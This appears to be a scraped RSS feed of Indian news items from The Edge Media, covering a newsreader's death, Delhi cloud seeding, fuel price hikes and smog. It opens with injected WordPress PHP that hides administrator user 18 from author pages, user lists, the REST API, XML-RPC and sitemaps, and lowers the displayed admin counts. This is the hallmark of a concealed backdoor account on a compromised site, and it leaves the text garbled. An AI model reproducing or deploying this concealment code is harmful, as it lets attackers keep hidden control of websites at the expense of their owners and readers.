add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Sarla Maheshwari Passes Away at 71, The End of a Distinguished Voice appeared first on The Edge Media.
]]>The news of her death prompted an outpouring of grief from colleagues, political leaders, journalists, and viewers across the country. Many took to social media to remember her as a symbol of credibility and grace in Indian news broadcasting. Admirers recalled how her composed presence and precise diction made her one of the most trusted faces on television.
Sarla Maheshwari began her career as a news presenter in 1976. At a time when television was still evolving in India, she quickly established herself as a dependable and dignified anchor. In 1982, she joined Doordarshan, the national broadcaster, where she was entrusted with reading major news bulletins. Her association with the channel continued for over two decades, and she remained active in news presentation until 2005.
Throughout her career, she became synonymous with Doordarshan’s identity. Her delivery style was marked by restraint, clarity, and authority, qualities that helped shape the standards of television news in the country. She was regarded as one of the prominent voices of Indian broadcasting during a period when Doordarshan was the primary source of televised news for millions.
Colleagues from the media fraternity described her as disciplined, knowledgeable, and deeply committed to journalism. Several former news readers and media professionals expressed their sorrow, calling her a mentor figure who set high benchmarks for professionalism.
Her contribution to Indian television journalism extended beyond reading news. She represented a generation of anchors who brought dignity and seriousness to the medium, helping to build public trust in televised news.
With her passing, Indian broadcasting has lost one of its most respected pioneers. Sarla Maheshwari’s calm voice and dignified presence will continue to be remembered by audiences who associated her with reliability and authenticity in news reporting.
The post Sarla Maheshwari Passes Away at 71, The End of a Distinguished Voice appeared first on The Edge Media.
]]>The post IIT-Kanpur Director Explains Cloud Seeding Trial in Delhi, Costs and Findings appeared first on The Edge Media.
]]>The Delhi government had conducted two cloud-seeding trials on Tuesday, in collaboration with IIT-Kanpur, in areas such as Burari, north Karol Bagh, and Mayur Vihar. While there was no significant rainfall in these regions, light rainfall was recorded in Noida and Greater Noida after the trials.
Agrawal explained that the trial covered an area of approximately 300 square kilometers, with an estimated total cost of around Rs 60 lakh, which translates to about Rs 20,000 per square kilometer. He further stated that if the process were expanded to cover 1,000 square kilometers, the total cost would amount to approximately Rs 2 crore.
He also highlighted the projected cost of conducting cloud seeding over an entire winter period, assuming cloud availability once every 10 days. In such a scenario, the overall cost would range between Rs 25 crore and Rs 30 crore. Agrawal added that this amount is relatively small when compared to the significant funds spent on pollution control measures in the city.
The IIT-Kanpur director explained that the low moisture content in the clouds, which was only about 15%, reduced the likelihood of successful rainfall. Despite not achieving the desired rainfall, Agrawal pointed out that the trial provided valuable data. He mentioned that 15 monitoring stations were set up across various locations to assess air pollution and moisture levels. The results showed a reduction in PM 2.5 and PM 10 concentrations, suggesting that even with limited moisture, cloud seeding had some effect on air quality.
As part of the trials, a mixture of common salt, rock salt, and silver iodide was injected into the clouds. Agrawal clarified that the tiny particles helped in the condensation process, allowing water droplets to form, and when these droplets accumulated, they eventually led to rainfall.
A scheduled cloud-seeding trial for Wednesday was postponed due to insufficient moisture in the clouds.
The post IIT-Kanpur Director Explains Cloud Seeding Trial in Delhi, Costs and Findings appeared first on The Edge Media.
]]>The post No More Strict Covid Restrictions in Tamil Nadu, Wearing Masks Is Still Advised appeared first on The Edge Media.
]]>As the COVID-19 conditions have improved significantly across the nation, some states, notably West Bengal, Maharashtra, and Delhi, have opted to relax virus outbreak regulations like as the requirement to use face masks and the prohibition on social events.
The post No More Strict Covid Restrictions in Tamil Nadu, Wearing Masks Is Still Advised appeared first on The Edge Media.
]]>The post Petrol Price Hiked For The Seventh Time In Eight Days appeared first on The Edge Media.
]]>Fuel costs in India are updated on a daily basis. The rates were, meanwhile, constant for 137 days, from November 2021 till last Tuesday, when they were increased. The rates have practically doubled every day since that day.
The post Petrol Price Hiked For The Seventh Time In Eight Days appeared first on The Edge Media.
]]>The post Central Trade Unions Calls For Bharat Bandh For Two Days, Day 1 Saw Effects appeared first on The Edge Media.
]]>The post Central Trade Unions Calls For Bharat Bandh For Two Days, Day 1 Saw Effects appeared first on The Edge Media.
]]>The post Price Hike of Diesel, Petrol, Cooking Gas After 4 Months appeared first on The Edge Media.
]]>Petrol and diesel prices in Mumbai, India’s financial hub, have risen to 110.82/liter and 95.00/liter, correspondingly. Fuel costs have also gone up in Chennai and Kolkata.
The post Price Hike of Diesel, Petrol, Cooking Gas After 4 Months appeared first on The Edge Media.
]]>The post 17,000 Indian Students Rescued from Ukraine, Claims Ministry of External Affairs appeared first on The Edge Media.
]]>
According to him, the Indian Air Force also has collaborated with Operation Ganga. He stated that there would be a plane from Bucharest to Delhi today. According to the MEA spokeswoman, several Indian students have indeed been permitted to leave the Kharkiv area, which really is a positive indication.
“Our Embassy’s warning to depart Kharkhiv is based on information we received from Russia. They should proceed westward, and they should do so, by all means, possible, even walking .” Bagchi said.
The post 17,000 Indian Students Rescued from Ukraine, Claims Ministry of External Affairs appeared first on The Edge Media.
]]>The post Two Delhi-based journalists have been detained by Tripura police for ‘instigating’ communal animosity appeared first on The Edge Media.
]]>
Upon arriving, they went to Kakraban in Udaipur’s Gomati district, followed by minority-dominated areas in West Tripura and Sepahijala districts. On Saturday, they went to Fatikroy in the Unokoti district, where a Hindu mob allegedly vandalized an under-construction mosque in the Pal Bazar area, according to sources.
The post Two Delhi-based journalists have been detained by Tripura police for ‘instigating’ communal animosity appeared first on The Edge Media.
]]>The post On Brink of ‘Emergency’: Season’s Worst Air Quality Index for Delhi-NCR is 471 appeared first on The Edge Media.
]]>
Meanwhile, due to significant air pollution in Delhi, the Central Pollution Control Board (CPCB) has recommended citizens avoid stepping outside. It also mandated that the state government and commercial businesses minimize vehicle usage by at least 30% by working from home, carpooling, and optimizing field operations.
The post On Brink of ‘Emergency’: Season’s Worst Air Quality Index for Delhi-NCR is 471 appeared first on The Edge Media.
]]>The post As the smog in Delhi worsens, India’s Pollution Control Board advises residents to prepare for an emergency appeared first on The Edge Media.
]]>
A thick haze of toxic smog hung over Delhi, exacerbated by a spike in the burning of crop waste in surrounding farmlands. It reduced visibility and the Air Quality Index (AQI) hit 470 on a scale of 500, according to the pollution control board. This level of pollution means the air will affect healthy people and seriously impact those with existing diseases.
The post As the smog in Delhi worsens, India’s Pollution Control Board advises residents to prepare for an emergency appeared first on The Edge Media.
]]>